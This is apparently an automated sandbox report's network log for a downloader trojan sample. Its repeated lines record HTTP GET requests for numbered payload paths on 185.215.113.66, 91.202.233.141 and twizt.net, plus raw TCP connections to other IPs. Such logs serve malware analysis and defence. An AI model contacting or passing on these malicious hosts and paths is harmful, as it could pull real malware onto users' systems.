                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /ALLSTATA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: twizt.net
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: unknownTCP traffic detected without corresponding DNS query: 37.151.73.50
                            Source: unknownTCP traffic detected without corresponding DNS query: 37.151.73.50
                            Source: unknownTCP traffic detected without corresponding DNS query: 37.151.73.50
                            Source: unknownTCP traffic detected without corresponding DNS query: 37.151.73.50
                            Source: unknownTCP traffic detected without corresponding DNS query: 37.151.73.50
                            Source: unknownTCP traffic detected without corresponding DNS query: 93.117.37.145
                            Source: unknownTCP traffic detected without corresponding DNS query: 93.117.37.145
                            Source: unknownTCP traffic detected without corresponding DNS query: 93.117.37.145
                            Source: unknownTCP traffic detected without corresponding DNS query: 93.117.37.145
                            Source: unknownTCP traffic detected without corresponding DNS query: 93.117.37.145
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.154.184.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.154.184.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.154.184.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.154.184.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.177
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.177
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.177
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.177
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.177
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.154.184.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.177
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.177
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_00401C50 WSARecv,WSARecv,WSAGetLastError,Sleep,WSARecv,0_2_00401C50
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /ALLSTATA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: twizt.net
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
